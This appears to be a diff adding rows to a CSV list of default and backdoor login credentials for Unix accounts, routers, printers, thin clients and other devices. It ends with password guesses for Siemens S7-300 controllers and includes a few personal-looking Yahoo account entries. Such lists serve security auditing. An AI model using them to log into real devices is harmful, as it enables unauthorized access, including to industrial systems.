+unix,Generic,,,checkfsys,checkfsys,,, +unix,Generic,,,checksys,checksys,,, +unix,Generic,,,daemon,daemon,,, +unix,Generic,,,demo,,,, +unix,Generic,,,demo,demo,,, +unix,Generic,,,demos,,,, +unix,Generic,,,demos,demos,,, +unix,Generic,,,dni,,,, +unix,Generic,,,fal,,,, +unix,Generic,,,fal,fal,,, +unix,Generic,,,fax,fax,,, +unix,Generic,,,ftp,,,, +unix,Generic,,,ftp,ftp,,, +unix,Generic,,,games,games,,, +unix,Generic,,,gopher,gopher,,, +unix,Generic,,,gropher,,,, +unix,Generic,,,guest,,,, +unix,Generic,,,guest,guestgue,,, +unix,Generic,,,halt,,,, +unix,Generic,,,halt,halt,,, +unix,Generic,,,informix,informix,,, +unix,Generic,,,install,install,,, +unix,Generic,,,lp,,,, +unix,Generic,,,lp,lp,,, +unix,Generic,,,lpadm,lpadm,,, +unix,Generic,,,lpadmin,lpadmin,,, +unix,Generic,,,lynx,,,, +unix,Generic,,,mail,,,, +unix,Generic,,,mail,mail,,, +unix,Generic,,,man,man,,, +unix,Generic,,,me,,,, +unix,Generic,,,mountfs,mountfs,,, +unix,Generic,,,mountfsys,mountfsys,,, +unix,Generic,,,mountsys,mountsys,,, +unix,Generic,,,news,news,,, +unix,Generic,,,nobody,,,, +unix,Generic,,,nobody,nobody,,, +unix,Generic,,,nuucp,,,, +unix,Generic,,,operator,,,, +unix,Generic,,,operator,operator,,, +unix,Generic,,,oracle,,,, +unix,Generic,,,postmaster,postmast,,, +unix,Generic,,,powerdown,powerdown,,, +unix,Generic,,,rje,rje,,, +unix,Generic,,,root,root,,, +unix,Generic,,,setup,setup,,, +unix,Generic,,,shutdown,,,, +unix,Generic,,,shutdown,shutdown,,, +unix,Generic,,,sync,,,, +unix,Generic,,,sync,sync,,, +unix,Generic,,,sys,sys,,, +unix,Generic,,,sys,system,,, +unix,Generic,,,sysadm,admin,,, +unix,Generic,,,sysadm,sysadm,,, +unix,Generic,,,sysadmin,sysadmin,,, +unix,Generic,,,sysbin,sysbin,,, +unix,Generic,,,system_admin,,,, +unix,Generic,,,system_admin,system_admin,,, +unix,Generic,,,trouble,trouble,,, +unix,Generic,,,umountfs,umountfs,,, +unix,Generic,,,umountfsys,umountfsys,,, +unix,Generic,,,umountsys,umountsys,,, +unix,Generic,,,unix,unix,,, +unix,Generic,,,user,user,,, +unix,Generic,,,uucp,uucp,,, +unix,Generic,,,uucpadm,uucpadm,,, +unix,Generic,,,web,,,, +unix,Generic,,,web,web,,, +unix,Generic,,,webmaster,,,, +unix,Generic,,,www,,,, +unix,Generic,,Admin,adm,,,, +unix,Generic,,Admin,adm,adm,,, +unix,Generic,,Admin,bin,sys,,, +unix,Generic,,Admin,install,install,,, +unix,Generic,,Admin,mountfs,mountfs,,, +unix,Generic,,Admin,mountfsys,mountfsys,,, +unix,Generic,,Admin,mountsys,mountsys,,, +unix,Generic,,Admin,root,,,, +unix,Generic,,Admin,root,hp,,, +unix,Generic,,Admin,root,root,,, +unix,Generic,,Admin,setup,setup,,, +unix,Generic,,Admin,sys,bin,,, +unix,Generic,,Admin,sys,sys,,, +unix,Generic,,Admin,sys,system,,, +unix,Generic,,Admin,sysadm,admin,,, +unix,Generic,,Admin,sysadm,sysadm,,, +unix,Generic,,Admin,sysadmin,sysadmin,,, +unix,Generic,,Admin,sysbin,sysbin,,, +unix,Generic,,Admin,system_admin,,,, +unix,Generic,,Admin,system_admin,system_admin,,, +unix,Generic,,HP-UX,root,hp,,, +unix,Generic,,Multi,adm,,Admin,, +unix,Generic,,Multi,adm,adm,Admin,, +unix,Generic,,Multi,admin,admin,User,, +unix,Generic,,Multi,administrator,,User,, +unix,Generic,,Multi,administrator,administrator,User,, +unix,Generic,,Multi,anon,anon,User,, +unix,Generic,,Multi,bbs,,User,, +unix,Generic,,Multi,bbs,bbs,User,, +unix,Generic,,Multi,bin,sys,Admin,, +unix,Generic,,Multi,checkfs,checkfs,User,, +unix,Generic,,Multi,checkfsys,checkfsys,User,, +unix,Generic,,Multi,checksys,checksys,User,, +unix,Generic,,Multi,daemon,,User,, +unix,Generic,,Multi,daemon,daemon,User,, +unix,Generic,,Multi,demo,,User,, +unix,Generic,,Multi,demo,demo,User,, +unix,Generic,,Multi,demos,,User,, +unix,Generic,,Multi,demos,demos,User,, +unix,Generic,,Multi,dni,,User,, +unix,Generic,,Multi,dni,dni,User,, +unix,Generic,,Multi,fal,,User,, +unix,Generic,,Multi,fal,fal,User,, +unix,Generic,,Multi,fax,,User,, +unix,Generic,,Multi,fax,fax,User,, +unix,Generic,,Multi,ftp,,User,, +unix,Generic,,Multi,ftp,ftp,User,, +unix,Generic,,Multi,games,,User,, +unix,Generic,,Multi,games,games,User,, +unix,Generic,,Multi,gopher,gopher,User,, +unix,Generic,,Multi,gropher,,User,, +unix,Generic,,Multi,guest,,User,, +unix,Generic,,Multi,guest,guest,User,, +unix,Generic,,Multi,guest,guestgue,User,, +unix,Generic,,Multi,halt,,User,, +unix,Generic,,Multi,halt,halt,User,, +unix,Generic,,Multi,informix,informix,User,, +unix,Generic,,Multi,install,install,Admin,, +unix,Generic,,Multi,lp,,User,, +unix,Generic,,Multi,lp,bin,User,, +unix,Generic,,Multi,lp,lineprin,User,, +unix,Generic,,Multi,lp,lp,User,, +unix,Generic,,Multi,lpadm,lpadm,User,, +unix,Generic,,Multi,lpadmin,lpadmin,User,, +unix,Generic,,Multi,lynx,,User,, +unix,Generic,,Multi,lynx,lynx,User,, +unix,Generic,,Multi,mail,,User,, +unix,Generic,,Multi,mail,mail,User,, +unix,Generic,,Multi,man,,User,, +unix,Generic,,Multi,man,man,User,, +unix,Generic,,Multi,me,,User,, +unix,Generic,,Multi,me,me,User,, +unix,Generic,,Multi,mountfs,mountfs,Admin,, +unix,Generic,,Multi,mountfsys,mountfsys,Admin,, +unix,Generic,,Multi,mountsys,mountsys,Admin,, +unix,Generic,,Multi,news,,User,, +unix,Generic,,Multi,news,news,User,, +unix,Generic,,Multi,nobody,,User,, +unix,Generic,,Multi,nobody,nobody,User,, +unix,Generic,,Multi,nuucp,,User,, +unix,Generic,,Multi,operator,,User,, +unix,Generic,,Multi,operator,operator,User,, +unix,Generic,,Multi,oracle,,User,, +unix,Generic,,Multi,postmaster,,User,, +unix,Generic,,Multi,postmaster,postmast,User,, +unix,Generic,,Multi,powerdown,powerdown,User,, +unix,Generic,,Multi,root,,Admin,, +unix,Generic,,Multi,root,root,Admin,, +unix,Generic,,Multi,setup,setup,Admin,, +unix,Generic,,Multi,shutdown,,User,, +unix,Generic,,Multi,shutdown,shutdown,User,, +unix,Generic,,Multi,sync,,User,, +unix,Generic,,Multi,sync,sync,User,, +unix,Generic,,Multi,sys,bin,Admin,, +unix,Generic,,Multi,sys,sys,Admin,, +unix,Generic,,Multi,sys,system,Admin,, +unix,Generic,,Multi,sysadm,admin,Admin,, +unix,Generic,,Multi,sysadm,sysadm,Admin,, +unix,Generic,,Multi,sysadmin,sysadmin,Admin,, +unix,Generic,,Multi,sysbin,sysbin,Admin,, +unix,Generic,,Multi,system_admin,,Admin,, +unix,Generic,,Multi,system_admin,system_admin,Admin,, +unix,Generic,,Multi,trouble,trouble,User,, +unix,Generic,,Multi,umountfs,umountfs,User,, +unix,Generic,,Multi,umountfsys,umountfsys,User,, +unix,Generic,,Multi,umountsys,umountsys,User,, +unix,Generic,,Multi,unix,unix,User,, +unix,Generic,,Multi,user,user,User,, +unix,Generic,,Multi,uucp,uucp,User,, +unix,Generic,,Multi,uucpadm,uucpadm,User,, +unix,Generic,,Multi,web,,User,, +unix,Generic,,Multi,web,web,User,, +unix,Generic,,Multi,webmaster,,User,, +unix,Generic,,Multi,webmaster,webmaster,User,, +unix,Generic,,Multi,www,,User,, +unix,Generic,,Multi,www,www,User,, +unix,Generic,,User,admin,admin,,, +unix,Generic,,User,administrator,,,, +unix,Generic,,User,administrator,administrator,,, +unix,Generic,,User,anon,anon,,, +unix,Generic,,User,bbs,,,, +unix,Generic,,User,bbs,bbs,,, +unix,Generic,,User,checkfs,checkfs,,, +unix,Generic,,User,checkfsys,checkfsys,,, +unix,Generic,,User,checksys,checksys,,, +unix,Generic,,User,daemon,,,, +unix,Generic,,User,daemon,daemon,,, +unix,Generic,,User,demo,,,, +unix,Generic,,User,demo,demo,,, +unix,Generic,,User,demos,,,, +unix,Generic,,User,demos,demos,,, +unix,Generic,,User,dni,,,, +unix,Generic,,User,dni,dni,,, +unix,Generic,,User,fal,,,, +unix,Generic,,User,fal,fal,,, +unix,Generic,,User,fax,,,, +unix,Generic,,User,fax,fax,,, +unix,Generic,,User,ftp,,,, +unix,Generic,,User,ftp,ftp,,, +unix,Generic,,User,games,,,, +unix,Generic,,User,games,games,,, +unix,Generic,,User,gopher,gopher,,, +unix,Generic,,User,gropher,,,, +unix,Generic,,User,guest,,,, +unix,Generic,,User,guest,guest,,, +unix,Generic,,User,guest,guestgue,,, +unix,Generic,,User,halt,,,, +unix,Generic,,User,halt,halt,,, +unix,Generic,,User,informix,informix,,, +unix,Generic,,User,lp,,,, +unix,Generic,,User,lp,bin,,, +unix,Generic,,User,lp,lineprin,,, +unix,Generic,,User,lp,lp,,, +unix,Generic,,User,lpadm,lpadm,,, +unix,Generic,,User,lpadmin,lpadmin,,, +unix,Generic,,User,lynx,,,, +unix,Generic,,User,lynx,lynx,,, +unix,Generic,,User,mail,,,, +unix,Generic,,User,mail,mail,,, +unix,Generic,,User,man,,,, +unix,Generic,,User,man,man,,, +unix,Generic,,User,me,,,, +unix,Generic,,User,me,me,,, +unix,Generic,,User,news,,,, +unix,Generic,,User,news,news,,, +unix,Generic,,User,nobody,,,, +unix,Generic,,User,nobody,nobody,,, +unix,Generic,,User,nuucp,,,, +unix,Generic,,User,operator,,,, +unix,Generic,,User,operator,operator,,, +unix,Generic,,User,oracle,,,, +unix,Generic,,User,postmaster,,,, +unix,Generic,,User,postmaster,postmast,,, +unix,Generic,,User,powerdown,powerdown,,, +unix,Generic,,User,rje,rje,,, +unix,Generic,,User,shu|own,,,, +unix,Generic,,User,shu|own,shu|own,,, +unix,Generic,,User,sync,,,, +unix,Generic,,User,sync,sync,,, +unix,Generic,,User,trouble,trouble,,, +unix,Generic,,User,umountfs,umountfs,,, +unix,Generic,,User,umountfsys,umountfsys,,, +unix,Generic,,User,umountsys,umountsys,,, +unix,Generic,,User,unix,unix,,, +unix,Generic,,User,user,user,,, +unix,Generic,,User,uucp,uucp,,, +unix,Generic,,User,uucpadm,uucpadm,,, +unix,Generic,,User,web,,,, +unix,Generic,,User,web,web,,, +unix,Generic,,User,webmaster,,,, +unix,Generic,,User,webmaster,webmaster,,, +unix,Generic,,User,www,,,, +unix,Generic,,User,www,www,,, +unix,Generic,HP-UX,Multi,root,hp,Admin,, +unix,Generic,early versions,console or telnet,root,gnomes,Admin,early backdoor password that likely is no longer in use anywhere except by nostalgic old-school admins running much newer systems, +unix,UNIX,,,setup,,,, +unix,Unix,,,service,smile,,, +unknown,POCSAG Radio Paging,,2.05,,password,,, +unknown,System 88,,,operator,operator,,, +unknown,System 88,,,overseer,overseer,,, +unknown,System 88,,,test,test,,, +us robotics,USR8000,,1.23 / 1.25,root,admin,,, +us robotics,USR8000,,Admin,root,admin,,, +us robotics,USR8550,,3.0.5,Any,12345,,, +usrobotics,805451,805451,,usr54321,usr54321,full,access, +usrobotics,ADSL Ethernet Modem,,HTTP,,12345,Admin,, +usrobotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin,, +usrobotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin,, +usrobotics,SureConnect ADSL ,SureConnect ADSL ,Telnet,support,support,User,works after 3rd login trial, +usrobotics,TOTALswitch,,,,amber,,, +usrobotics,TOTALswitch,,,,amber,,Any, +usrobotics,USR5450,,,admin,,Admin,, +usrobotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always uses user root, +usrobotics,USR8054 Router,,,admin,,,, +usrobotics,USR8550,,Any,Any,12345,,, +usrobotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem, +usrobotics,adsl gateway wireless router,,wireless router,support,support,super user access,I find it on a manual, +utlexar,Telephone Switches,,,DESIGNED_BY_IC_KF,,Backdoor,, +utlexar,Telephone Switches,,,lexar,,maintenance default,, +utstar,UT300R,,Multi,admin,utstar,root,, +utstar,UT300R,,root,admin,utstar,,, +utstarcom,B-NAS B-RAS,,1000,dbase,dbase,,, +utstarcom,B-NAS B-RAS,,1000,field,field,,, +utstarcom,B-NAS B-RAS,,1000,guru,*3noguru,,, +utstarcom,B-NAS B-RAS,,1000,snmp,snmp,,, +utstarcom,B-NAS,B-RAS,1000,,dbase,dbase,, +utstarcom,B-NAS,B-RAS,1000,,field,field,, +utstarcom,B-NAS,B-RAS,1000,,guru,*3noguru,, +utstarcom,B-NAS,B-RAS,1000,,snmp,snmp,, +vasco,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server, +veenman,Linium C353,all versions,console and IP,,12345678,admin,, +vendor,Product,Revision,Protocol,User,Password,Access,Notes, +vendor,system,,verified,password,level,,, +vendor,system,,version,login,password,,, +veramark,eCAS,,Administrative,admin,password,,, +verifone,Verifone Junior,,,,166816,,, +verifone,Verifone Junior,,2.05,,166816,,, +verifone,Verifone Junior,2.05,,,166816,,, +verilink,NE6100-4 NetEngine,IAD 3.4.8,Telnet,,,Guest,, +veritas,Cluster Server,,,admin,password,,, +veritas,Cluster Server,,http,admin,password,Admin,, +verity,Ultraseek,,http,admin,admin,Admin,, +vertex,VERTEX 1501,,5.05,root,vertex25,,, +vertex,Vertex 1501,5.05,,root,vertex25,Admin,, +vextrec technology,PC BIOS,,,,Vextrex,,, +vextrectechnology,PC BIOS,,Console,,Vextrex,,, +vienuke,VieBoard,,2.6,admin,admin,,, +vienuke,VieBoard,2.6,,admin,admin,Administrator,, +vina technologies,ConnectReach,,,,,,, +vinatechnologies,ConnectReach,,,,,,3.6.2, +virtual programming,VP-ASP Shopping Cart,,5.0,admin,admin,,, +virtual programming,VP-ASP Shopping Cart,,5.0,vpasp,vpasp,,, +virtualprogramming,VP-ASP Shopping Cart,5.0,,admin,admin,Admin,, +virtualprogramming,VP-ASP Shopping Cart,5.0,,vpasp,vpasp,Admin,, +visa vap,VAP,,,root,QNX,,, +visa,Visa VAP,,Telnet/modem,root,QNX,root,, +visualnetworks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin,, +vobis,PC BIOS,,,,merlin,,, +vobis,PC BIOS,,Console,,merlin,,, +voicegenietechnologies,VoiceGenie,,,pw,pw,Admin,, +vpasp,VP-ASP Shopping Cart,,,admin,admin,,, +vpasp,VP-ASP Shopping Cart,,,vpasp,vpasp,,, +vxworks,misc,,Multi,admin,admin,Admin,, +vxworks,misc,,Multi,guest,guest,Guest,, +waav,X2,,Admin,admin,waav,,, +wanadoo,Livebox,,Multi,admin,admin,Admin,, +wang,Wang,,Multi,CSG,SESAME,Admin,, +warracorp,janon,,guest,pepino,pepino,,, +warracorp,janon,2.1,HTTP,pepino,pepino,guest,, +watch guard,firebox 1000,,,admin,,,, +watch guard,firebox 1000,,Admin,admin,,,, +watchguard,FireBox,,,,wg,,, +watchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN, +watchguard,firebox 1000,,Multi,admin,,Admin,, +web wiz,Forums,,7.x,Administrator,letmein,,, +weblogic,weblogic,,yes,system,weblogic,,, +webmin,Webmin,,,admin,,,default linux install, +webmin,Webmin,,,admin,hp.com,,, +webmin,Webmin,,http,admin,hp.com,Admin,, +webramp,410i etc...,,,wradmin,trancell,,, +webramp,Unknown,,,wradmin,trancell,,, +webwiz,Forums,7.x,http,Administrator,letmein,Admin,, +westell,2200,,Multi,admin,password,Admin,, +westell,Versalink 2200,,,admin,password,,, +westell,Versalink 327,,,admin,password,,, +westell,Versalink 327,,Multi,admin,,Admin,, +westell,Versalink 6100,,,admin,password,,, +westell,Wang,,Multi,CSG,SESAME,Admin,, +westell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin,, +westell,Wirespeed,,Multi,admin,password,Admin,, +westell,Wirespeed,,Multi,admin,sysAdmin,Admin,, +wim bervoets,WIMBIOSnbsp BIOS,,,,Compleri,,, +wim bervoets,WIMBIOSnbsp BIOS,,Admin,,Compleri,,, +wimbervoets,WIMBIOSnbsp BIOS,,Console,,Compleri,Admin,, +winwork,iso sistemi,,,operator,,,, +winwork,iso sistemi,,Admin,operator,,,, +wireless inc.,WaveNet,,,root,rootpass,,, +wirelessinc,WaveNet 2458,,,root,rootpass,,, +worldclient,AdminServer,,,WebAdmin,Admin,,, +worldclient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient,, +worldclient,AdminServer,,WorldClient,WebAdmin,Admin,,, +www.soft.vip600.com,123,,,anonymous,anonymous,,, +wwwboard,WWWADMIN.PL,,,WebAdmin,WebBoard,,, +wwwboard,WWWADMIN.PL,,Admin,WebAdmin,WebBoard,,, +wwwboard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin,, +wyse,V90 series thin client,all,BIOS,,Fireport,BIOS,, +wyse,V90,,VNC,,Wyse,,, +wyse,WT 1125 SE,,,user,user,,, +wyse,WT9235LE,XPe (XP embedded),console login,Administrator,Administrator,local Admin,(case sensitive), +wyse,Winterm 3150,,VNC,,password,Admin,, +wyse,Winterm,,5440XL,VNC,winterm,,, +wyse,Winterm,,5440XL,root,wyse,,, +wyse,Winterm,,Admin,root,wyse,,, +wyse,Winterm,,VNC,VNC,winterm,,, +wyse,Winterm,5440XL,Console,root,wyse,Admin,, +wyse,Winterm,5440XL,VNC,VNC,winterm,VNC,, +wyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive, +wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server.,, +wyse,v90le,unknown,console,Administrator,Administrator,,, +wyse,winterm,,Multi,root,,Admin,, +x-micro,WLAN 11b Broadband Router,,,1502,1502,,, +x-micro,WLAN 11b Broadband Router,,,super,super,,, +xavi,7000-ABA-ST1,,Console,,,Admin,, +xavi,7001,,Console,,,Admin,, +xavi,X7722r,,192.168.1.1,admin,admin,,, +xavi,X7722r,all,HTTP,admin,admin,192.168.1.1,, +xerox,61xx,All,DocuSP,Administrator,administ,,, +xerox,7232,,,11111,x-admin,,, +xerox,77xx,,http,admin,1111,,, +xerox,ApeosIII 4300,,HTTP,11111,x-admin,Admin,, +xerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,source http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/, +xerox,DocuColor 1632,,console,,11111,Admin,, +xerox,DocuColor 1632,,http,admin,admin,Admin,, +xerox,DocuColor,,1632,,11111,,, +xerox,DocuColor,,1632,admin,admin,,, +xerox,Document Centre 405,-,HTTP,admin,admin,Admin,, +xerox,Document Centre 425,,HTTP,admin,,Admin,, +xerox,Document Centre 425,,HTTP,admin,22222,Admin,works for access panel 2, +xerox,Document Centre 432,,,admin,22222,,, +xerox,Document Centre 432,,http,admin,22222,Admin,, +xerox,Document Centre c320,,HTTP,admin,admin,,Default machine admin password: 11111, +xerox,Fiery,,,Administrator,Fiery.1,,, +xerox,Fiery,,HTTP,Administrator,Fiery.1,,, +xerox,Fiery,2.0,remove desktop,Administrator,fiery.1,,, +xerox,Multi Function Equipment,,,admin,2222,,, +xerox,Multi Function Equipment,,Admin,admin,2222,,, +xerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access, +xerox,Phaser 3600,,,admin,1111,,, +xerox,Work Center Pro C2128,,http,admin,1111,,, +xerox,WorkCenter 2640,,http://,admin,1111,,, +xerox,WorkCenter Pro 428,,,admin,admin,,, +xerox,WorkCenter Pro 428,,Admin,admin,admin,,, +xerox,WorkCentre 265,v1,http,admin,1111,,, +xerox,WorkCentre 5230,all,web,11111,x-admin,,, +xerox,WorkCentre 5675,All,Console, HTTP,admin,1111,, +xerox,WorkCentre 57xx,,http,admin,1111,,, +xerox,WorkCentre 7245,,http,11111,x-admin,Admin,, +xerox,WorkCentre 7328,,http,11111,x-admin,,, +xerox,WorkCentre 7335,,,11111,x-admin,,, +xerox,WorkCentre 7345,,,11111,x-admin,,, +xerox,WorkCentre 7425,,http or console,admin,1111,,, +xerox,WorkCentre 7665,,,admin,1111,,, +xerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\192.168.0.1admintool, +xerox,WorkCentre M20i,,http,admin,1111,Admin,, +xerox,WorkCentre PE 120i,,IP address,admin,1111,,, +xerox,WorkCentre Pro 35,,HTTP,admin,1111,Admin,, +xerox,WorkCentre Pro 420,,,admin,sysadm,,, +xerox,WorkCentre Pro 428,,HTTP,admin,admin,Admin,, +xerox,WorkCentre Pro 45,,HTTP,admin,1111,Admin,, +xerox,WorkCentre Pro,,45,admin,1111,,, +xerox,WorkCentre and DocumentCentre,,,savelogs,crash,,, +xerox,WorkCentre,7232/7242,http,11111,x-admin,Administrator,, +xerox,WorkCentre/DocumentCentre,,,savelogs,crash,,, +xerox,Workcenter 245 Pro,,HTTP,admin,1111,,, +xerox,Workcentre 7120,All,Http,admin,1111,Admin,, +xerox,xerox,,Multi,,admin,Admin,, +xerox,xerox,,Multi,admin,admin,Admin,, +xincom,XC-DPG402,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG502,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG503,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG602,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG603,,http://192.168.1.1,admin,,Administration,, +xmicro,WLAN 11b Access Point,1.2.2,Multi,super,super,Admin,, +xmicro,X-Micro WLAN 11b Broadband Router,1.2.2 1.2.2.3 1.2.2.4 1.6.0.0,Multi,super,super,Admin,From BUGTRAQ, +xmicro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ, +xylan,Omnistack 1032CF,,,admin,password,,3.2.8, +xylan,Omnistack 4024,,,admin,password,,3.4.9, +xylan,Omniswitch,,,admin,switch,,, +xylan,Omniswitch,,,admin,switch,,3.1.8, +xylan,Omniswitch,,,diag,switch,,, +xylan,Omniswitch,,Admin,admin,switch,,, +xylan,Omniswitch,,Telnet,admin,switch,Admin,, +xylan,Omniswitch,,Telnet,diag,switch,Admin,, +xyplex,Routers,,,,system,,, +xyplex,Routers,,Admin,,system,,, +xyplex,Routers,,Port 7000,,access,User,, +xyplex,Routers,,Port 7000,,system,Admin,, +xyplex,Routers,,User,,access,,, +xyplex,Terminal Server,,,,access,,, +xyplex,Terminal Server,,,,system,,, +xyplex,Terminal Server,,Admin,,system,,, +xyplex,Terminal Server,,Port 7000,,access,User,, +xyplex,Terminal Server,,Port 7000,,system,Admin,, +xyplex,Terminal Server,,User,,access,,, +xyplex,mx-16xx,,,setpriv,system,,, +xyplex,switch,3.2,Console,,,Admin,, +yahoo,mail,yes,Multi,1234567890,bloggs,yes,, +yahoo,messenger,messenger,Multi,handsome_123_handsome,plsdontguess,password,, +yahoo,messenger,messenger,Multi,intelligent_guy_priyank,passwordguy,password,, +yakumo,Routers,,HTTP,admin,admin,Admin,, +yuxin,YWH10 IP Phone,,http,User,1234,Admin,, +yuxin,YWH10 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH100 IP Phone,,http,User,1234,Admin,, +yuxin,YWH100 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH200 IP Phone,,http,User,1234,Admin,, +yuxin,YWH200 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH300 IP Phone,,http,User,1234,Admin,, +yuxin,YWH300 IP Phone,,http,User,19750407,Admin,, +zcom,Wireless,,SNMP,root,admin,Admin,, +zcom,XG1021 N,,,admin,password,,, +zebra,10/100 Print Server,,Multi,admin,1234,Admin,, +zenith,PC BIOS,,,,3098z,,, +zenith,PC BIOS,,,,Zenith,,, +zenith,PC BIOS,,Admin,,3098z,,, +zenith,PC BIOS,,Admin,,Zenith,,, +zenith,PC BIOS,,Console,,3098z,Admin,, +zenith,PC BIOS,,Console,,Zenith,Admin,, +zeos,PC BIOS,,,,zeosx,,, +zeos,PC BIOS,,Admin,,zeosx,,, +zeos,PC BIOS,,Console,,zeosx,Admin,, +zeus,Zeus Admin Server,,4.1r2,admin,,,, +zeus,Zeus Admin Server,4.1r2,http,admin,,,, +zoom,ADSL X3,,,admin,zoomadsl,,, +zoom,ADSL X3,,HTTP,admin,zoomadsl,,, +zoom,IG-4165,,http://192.168.123.254,,admin,Administration,, +zoom,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin,, +zyxel,641 ADSL,,,,1234,,, +zyxel,642R,,Admin,,1234,,, +zyxel,642R,,Telnet,,1234,Admin,, +zyxel,660,,,1234,1234,,, +zyxel,660R-61C,1.0,http://192.168.1.1/,mikucha,abadaifice,root,abadaifice, +zyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,abadaifice, +zyxel,ADSL routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no, +zyxel,G-1000,,http://192.168.1.2,,1234,Administration,, +zyxel,G-2000 Plus,,http://192.168.1.1,,1234,Administration,, +zyxel,G-3000H,,http://192.168.1.2,,1234,Administration,, +zyxel,G-560,,http://192.168.1.2,,1234,Administration,, +zyxel,G-570S,,http://192.168.1.2,,1234,Administration,, +zyxel,Generic Routers,,,,1234,,, +zyxel,Generic Routers,,Admin,,1234,,, +zyxel,Generic Routers,,Telnet,,1234,Admin,, +zyxel,Generic,,Admin,Admin,atc456,,, +zyxel,ISDN Router Prestige 100IH,,,,1234,,, +zyxel,ISDN-Router Prestige 1000,,,,1234,,, +zyxel,P-320W,,,user11,@12345,,, +zyxel,P-330 W EE,4312,,admin,1234,,, +zyxel,P-623,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-645,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-650,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-660HW,,http://192.168.1.1,,1234,Administration,, +zyxel,P-660RU,,http://192.168.1.1,,1234,Administration,, +zyxel,P-660h-t1 v2,ALL VERSIONS ETC,192.168.1.1,,,,, +zyxel,P-794M,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-964APR,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-964CM,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-964CR,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-971M,,http://192.168.1001,webadmin,1234,Administration,, +zyxel,P-974,,,admin,1234,,, +zyxel,P861H,,Multi,admin,1234,Web + Telnet,, +zyxel,P861H,,Web + Telnet,admin,1234,,, +zyxel,Prestige ,660R-61C,,,1234,,, +zyxel,Prestige 100IH,,,,1234,,, +zyxel,Prestige 100IH,,Console,,1234,Admin,, +zyxel,Prestige 128 modem-router,,,,1234,,any, +zyxel,Prestige 300 series,,,,1234,,zynos 2.*, +zyxel,Prestige 643,,,,1234,,, +zyxel,Prestige 643,,Console,,1234,Admin,, +zyxel,Prestige 645,,HTTP,admin,1234,Admin,, +zyxel,Prestige 650,,Multi,1234,1234,Admin,, +zyxel,Prestige 652HW-31 ADSL Router,,,admin,1234,,, +zyxel,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1, +zyxel,Prestige 652HW-31,,,admin,1234,,, +zyxel,Prestige 660HW,,Multi,admin,admin,Admin,, +zyxel,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080, +zyxel,Prestige P660HW,,Multi,admin,1234,Admin,, +zyxel,Prestige,,,,1234,,, +zyxel,Prestige,,,root,1234,,, +zyxel,Prestige,,Admin,,1234,,, +zyxel,Prestige,,Admin,root,1234,,, +zyxel,Prestige,,FTP,root,1234,Admin,, +zyxel,Prestige,,HTTP,,1234,Admin,http://192.168.1.1, +zyxel,Prestige,,Telnet,,1234,Admin,, +zyxel,Switch,,Web/Telnet/CLI,admin,1234,,, +zyxel,Switch,ES-2108-G,Multi,admin,1234,Web/Telnet/CLI,, +zyxel,Windows Vista,P- 2602HWN-D7A,192.168.1.1.,anatoij,1234,1234,, +zyxel,ZyWALL Series Prestige 660R-61C,,Multi,,admin,Admin,, +zyxel,ZyWall 2,,HTTP,,,Admin,, +zyxel,Zywall,,Admin,admin,1234,,, +zyxel,Zywall,,Multi,admin,1234,Admin,, +zyxel,linux,4,http://192.168.1.1:8080,user,mr37net,root,-, +zyxel,p-660hw,t1,http://192.168.1.1,,,admin,, +zyxel,zyxer,cable moden,http:192.168.1.1:8080,webadmin,1234,user,desprogamado, +siemens s7-300,,,,,',,, +siemens s7-300,,,,,'',,, +siemens s7-300,,,,,''',,, +siemens s7-300,,,,,'''',,, +siemens s7-300,,,,,''''',,, +siemens s7-300,,,,,'''''',,, +siemens s7-300,,,,,''''''',,, +siemens s7-300,,,,,'''''''',,, +siemens s7-300,,,,,-,,, +siemens s7-300,,,,,--,,, +siemens s7-300,,,,,---,,, +siemens s7-300,,,,,----,,, +siemens s7-300,,,,,-----,,, +siemens s7-300,,,,,------,,, +siemens s7-300,,,,,-------,,, +siemens s7-300,,,,,--------,,, +siemens s7-300,,,,,!manage,,, +siemens s7-300,,,,,!MANAGE,,, +siemens s7-300,,,,,$secure$,,, +siemens s7-300,,,,,*,,, +siemens s7-300,,,,,**,,, +siemens s7-300,,,,,***,,, +siemens s7-300,,,,,****,,, +siemens s7-300,,,,,*****,,, +siemens s7-300,,,,,******,,, +siemens s7-300,,,,,*******,,, +siemens s7-300,,,,,********,,, +siemens s7-300,,,,,,,,, +siemens 